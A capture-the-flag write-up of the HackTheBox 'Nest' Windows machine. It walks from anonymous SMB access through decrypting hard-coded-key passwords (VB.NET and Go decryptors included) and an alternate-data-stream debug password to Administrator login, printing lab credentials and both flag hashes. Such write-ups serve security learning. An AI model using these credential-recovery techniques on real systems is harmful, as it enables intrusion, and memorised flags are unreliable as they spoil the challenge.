HackTheBox - Nest


Summary

Nest
Difficulty: Easy
OS: Windows
Release date: 25-01-2020

Nest was an easy Windows machine with an anonymously accessible SMB share. Both user access and root access were obtained by recovering hard-coded encryption parameters from VB.NET source and a decompiled .NET binary, combined with sensitive data found in files across the SMB shares.

Foothold

An Nmap scan reveals SMB on port 445.

mick@kali:~/Documents/HackTheBox/Nest$ nmap -sV -sC -Pn -oN nmap_nest 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 19:57 CEST
Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 4m07s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-04T18:02:16
|_  start_date: 2020-06-04T16:27:42

Fortunately, anonymous access was enabled and I was able to get a share listing.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient -L 10.10.10.178
Enter WORKGROUP\mick's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

User access

The “Data” share allowed anonymous access.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\mick's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

The only folder accessible, however, was “Shared”.

smb: \Shared\> ls
.                                   D        0  Wed Aug  7 21:07:51 2019
..                                  D        0  Wed Aug  7 21:07:51 2019
Maintenance                         D        0  Wed Aug  7 21:07:32 2019
Templates                           D        0  Wed Aug  7 21:08:07 2019

Navigating into “Templates” and subsequently into “HR” reveals a text file named “Welcome Email.txt”.

smb: \Shared\Templates\HR\> ls
.                                   D        0  Wed Aug  7 21:08:01 2019
..                                  D        0  Wed Aug  7 21:08:01 2019
Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

The file contains the following:

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

With a set of credentials in hand, the obvious next step, recalling the share listing from earlier, was the “Users” share. The credentials granted access to it.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Users -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

Unfortunately none of the user folders were accessible, except for “TempUser”, which only contained an empty text file. What did give further access was connecting to the “Data” share with the same credentials.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Data -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

Unlike the anonymous session, I now had access to all folders in this share. The only folder that contained content besides “Shared” was “IT”.

smb: \IT\> ls
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

smb: \IT\> cd Configs
smb: \IT\Configs\> ls
  .                                   D        0  Thu Aug  8 00:59:34 2019
  ..                                  D        0  Thu Aug  8 00:59:34 2019
  Adobe                               D        0  Wed Aug  7 21:20:09 2019
  Atlas                               D        0  Tue Aug  6 13:16:18 2019
  DLink                               D        0  Tue Aug  6 15:25:27 2019
  Microsoft                           D        0  Wed Aug  7 21:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 21:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 22:01:13 2019
  Server Manager                      D        0  Tue Aug  6 15:25:19 2019

While looking through the folders, two files caught my attention: “NotepadPlusPlus/config.xml” and “RU Scanner/RU_config.xml”. The file “config.xml” contained the following:

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
    <File filename="C:\windows\System32\drivers\etc\hosts"/>
    <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt"/>
    <File filename="C:\Users\C.Smith\Desktop\todo.txt"/>
</History>

Line 3 in the file gave away that Carl has a folder under “IT” in the “Secure$” share. The file “RU_config.xml” contained:

<?xml version="1.0" ?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <Port>389</Port>
    <Username>c.smith</Username>
    <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

This file appeared to contain credentials for the user “c.smith”, whom I assumed to be the same person as Carl. Base64-decoding the password produced gibberish, which told me the password is encrypted and only then Base64 encoded, so I started looking for a way to decrypt it. Since the “NotepadPlusPlus/config.xml” file had given away that Carl has a folder in the “Secure$” share, I tried to connect to that share.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Secure$ -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019

As TempUser I unfortunately didn’t have permission to list the contents of the IT folder. Luckily, the access control was incomplete: listing the folder was denied, but traversing into a known subfolder was not, so I could navigate directly to “IT\Carl”.

smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

Navigating around the folders I found an interesting folder called “RUScanner”, which by name is similar to the “RU_config.xml” file from earlier that contained credentials.

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

Transferring the files to my machine and checking them out revealed the following to me inside “Module1.vb”:

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub

End Module

This file loads a config file called “RU_Config.xml” (the one I discovered earlier) and decrypts the password it contains by calling DecryptString from the Utils class. The “Utils.vb” file, located in the same directory as “Module1.vb”, contains the following code (some code has been omitted for brevity):

Imports System.Text
Imports System.Security.Cryptography

Public Class Utils
    ...

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    ...

    Public Shared Function Decrypt(ByVal cipherText As String,
                                    ByVal passPhrase As String,
                                    ByVal saltValue As String,
                                    ByVal passwordIterations As Integer,
                                    ByVal initVector As String,
                                    ByVal keySize As Integer) As String
        ...
        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)
        ...

        Return plainText
    End Function

End Class

The code above was exactly what I needed to decrypt the password. DecryptString takes a Base64 encoded string and passes it to Decrypt together with the passphrase, salt, iteration count and IV. Hard-coding the passphrase, salt and IV in the program is the programmer’s mistake: anyone who obtains the source, or decompiles the binary, can recover every password it protects. The salt and IV should be generated randomly for each encryption and stored alongside the ciphertext, and the secret used to derive the key should never ship with the code. With these values I was able to decrypt the password from the configuration file. To do that, I wrote a VB.NET program that implemented the Decrypt function.

Imports System.Text
Imports System.Security.Cryptography

Module Module1

    Sub Main()
        Console.WriteLine("===================================")
        Console.WriteLine("Decrypting Carl's password for Nest")
        Console.WriteLine("===================================")
        Console.WriteLine("Carl's password is:")
        Console.WriteLine(Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256))
        Console.ReadKey()
    End Sub

    ' Members of a Module are implicitly shared, so the Shared modifier is not allowed here
    Public Function Decrypt(ByVal cipherText As String,
                            ByVal passPhrase As String,
                            ByVal saltValue As String,
                            ByVal passwordIterations As Integer,
                            ByVal initVector As String,
                            ByVal keySize As Integer) As String
        ...
        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)
        ...

        Return plainText
    End Function

End Module

The decryption was successful.

===================================
Decrypting Carl's password for Nest
===================================
Carl's password is:
xRxRxPANCAK3SxRxRx

The password ‘xRxRxPANCAK3SxRxRx’ provided me with user access to the machine.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Users -U c.smith%xRxRxPANCAK3SxRxRx
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019
smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

‘user.txt’: cf71b25404be5d84fd827e05f426e987

Root access

The “HQK Reporting” folder contained some interesting files.

smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

The folder “AD Integration Module” contained a file called “HqkLdap.exe”, which I downloaded for inspection later. “Debug Mode Password.txt” appeared to be empty (0 bytes), but running smbclient’s allinfo command on it showed that it carried an Alternate Data Stream.

As quoted from the Malwarebytes blog:

“Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system a file is built up from a couple of attributes, one of them is $Data, aka the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream. This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( “” ) . So any data stream that has a name is considered alternate.” - [https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/]

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt":Password

The command above retrieved the content of the ADS, using smbclient’s filename:streamname syntax to address the named stream directly, and revealed the password ‘WBQ201953D8w’.

Inside that same directory, “\C.Smith\HQK Reporting”, was a file called “HQK_Config_Backup.xml”. The file contained the following.

<?xml version="1.0" ?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <Port>4386</Port>
    <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>

A port number in a service configuration is always worth checking. A targeted Nmap scan confirmed that a service was indeed listening on port 4386.

mick@kali:~/Documents/HackTheBox/Nest$ nmap -sV -sC -Pn -p 4386 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 20:08 CEST
Nmap scan report for 10.10.10.178
Host is up (0.028s latency).

PORT     STATE SERVICE VERSION
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>

A connection to this service was made with telnet.

mick@kali:~/Documents/HackTheBox/Nest$ telnet 10.10.10.178 4386

>

The Nmap scan revealed the existence of a HELP command.

>HELP

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

>

Using the DEBUG command with the password discovered from the ADS earlier provided me with additional commands. SHOWQUERY, SERVICE and SESSION were new.

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

While examining the SETDIR command I discovered the ability to traverse directories.

>HELP setdir


SETDIR <Directory>
Selects a new directory where query files can be run from. Use the LIST command to view available directory names (marked with [DIR]) that can be used with this command. The special characters ".." can be used to go back upto the previous directory.

Examples:
SETDIR MY QUERIES       Changes to the directory named "MY QUERIES"
SETDIR ..               Changes to the parent directory of the current directory

The SERVICE command revealed which directory the service was running queries from.

>SERVICE

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES

Since the parent directory ‘HQK’ looked interesting, I used SETDIR .. to move up into it and then ran LIST.

>SETDIR ..
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

Going into the ‘LDAP’ directory I discovered two files: ‘HqkLdap.exe’, which I had already found earlier, and what was presumably a configuration file for that executable.

>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

This password, like the one for ‘c.smith’, was encrypted and Base64 encoded. Decrypting it with the same code that worked for ‘c.smith’ was unsuccessful, which told me that the decryption parameters differ for this password. Remembering the executable ‘HqkLdap.exe’ downloaded earlier from ‘C.Smith\HQK Reporting’, I decided to decompile it using ILSpy. A .NET executable is easy to decompile: unless it is obfuscated, decompilers return code that is nearly identical to the original source. After loading the executable into ILSpy and browsing the decompiled code, I found two functions that were almost identical to the encryption and decryption functions in ‘Utils.vb’ that were used to decrypt c.smith’s password.

[Image hqk_ldap_compile.png: HqkLdap.exe decompiled in ILSpy]

The passphrase, IV and salt were present in the source code again, this time with 3 password iterations instead of 2. Substituting those values into the earlier program allowed for successful decryption.

Imports System.Text
Imports System.Security.Cryptography

Module Module1

    Sub Main()
        Console.WriteLine("===================================")
        Console.WriteLine("Decrypting Administrator's password for Nest")
        Console.WriteLine("===================================")
        Console.WriteLine("Administrator's password is:")
        Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
        Console.ReadKey()
    End Sub

    ' Members of a Module are implicitly shared, so the Shared modifier is not allowed here
    Public Function Decrypt(ByVal cipherText As String,
                            ByVal passPhrase As String,
                            ByVal saltValue As String,
                            ByVal passwordIterations As Integer,
                            ByVal initVector As String,
                            ByVal keySize As Integer) As String
        ...
        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)
        ...

        Return plainText
    End Function

End Module

The decryption revealed the password ‘XtH4nkS4Pl4y1nGX’.

Decrypting Administrator's password for Nest
===================================
Administrator's password is:
XtH4nkS4Pl4y1nGX
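To show what the omitted Decrypt body has to do for both the c.smith and the Administrator ciphertexts quoted above, here is an added Go reimplementation of it (example code written for this page, not the RU Scanner or HqkLdap code). It assumes the elided body derives the key with PBKDF2-HMAC-SHA1, which is what .NET's Rfc2898DeriveBytes does by default, and decrypts with AES-256-CBC and PKCS#7 padding; only standard-library packages are used.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// pbkdf2SHA1 implements PBKDF2 with HMAC-SHA1 (RFC 2898). Assumed here to match
// .NET's Rfc2898DeriveBytes, which the omitted Decrypt body is taken to use.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	hLen := prf.Size()
	blocks := (keyLen + hLen - 1) / hLen // 32-byte key needs two 20-byte blocks
	out := make([]byte, 0, blocks*hLen)
	var idx [4]byte
	for i := 1; i <= blocks; i++ {
		binary.BigEndian.PutUint32(idx[:], uint32(i)) // U1 = PRF(P, S || INT(i))
		prf.Reset()
		prf.Write(salt)
		prf.Write(idx[:])
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for n := 1; n < iterations; n++ { // Un = PRF(P, Un-1); Ti = U1 xor ... xor Uc
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// pkcs7Unpad strips PKCS#7 padding and rejects a malformed trailer, which is
// what a wrong key or iteration count almost always produces.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("invalid PKCS#7 padding")
	}
	for _, p := range b[len(b)-n:] {
		if int(p) != n {
			return nil, errors.New("invalid PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

// Decrypt mirrors the VB.NET signature: key = PBKDF2(passPhrase, saltValue,
// iterations, keySize/8 bytes), then AES-CBC with the literal IV string.
func Decrypt(cipherText, passPhrase, saltValue string, iterations int, initVector string, keySize int) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(cipherText)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 || len(initVector) != aes.BlockSize {
		return "", errors.New("ciphertext or IV is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(passPhrase), []byte(saltValue), iterations, keySize/8))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(initVector)).CryptBlocks(pt, ct)
	plain, err := pkcs7Unpad(pt)
	return string(plain), err
}

func main() { // ciphertexts and parameters are the ones quoted on the page
	fmt.Println(Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256))
	fmt.Println(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
}
```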

This password provided Administrator access.

mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\C$ -U Administrator%XtH4nkS4Pl4y1nGX
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Tue Jul 14 04:34:39 2009
  Boot                              DHS        0  Sat Jan 25 22:15:35 2020
  bootmgr                          AHSR   383786  Sat Nov 20 05:40:08 2010
  BOOTSECT.BAK                     AHSR     8192  Tue Aug  6 07:16:26 2019
  Config.Msi                        DHS        0  Sat Jan 25 22:49:12 2020
  Documents and Settings            DHS        0  Tue Jul 14 07:06:44 2009
  pagefile.sys                      AHS 2146881536  Thu Jun  4 18:27:39 2020
  PerfLogs                            D        0  Tue Jul 14 05:20:08 2009
  Program Files                      DR        0  Thu Aug  8 01:40:50 2019
  Program Files (x86)                DR        0  Tue Jul 14 07:06:53 2009
  ProgramData                        DH        0  Mon Aug  5 22:24:41 2019
  Recovery                          DHS        0  Mon Aug  5 22:22:25 2019
  restartsvc.bat                      A       33  Thu Aug  8 01:43:09 2019
  Shares                              D        0  Tue Aug  6 15:59:55 2019
  System Volume Information         DHS        0  Tue Aug  6 06:17:38 2019
  Users                              DR        0  Thu Aug  8 19:19:40 2019
  Windows                             D        0  Sat Jan 25 22:22:42 2020

smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

‘root.txt’: 6594c2eb084bc0f08a42f0b94b878c41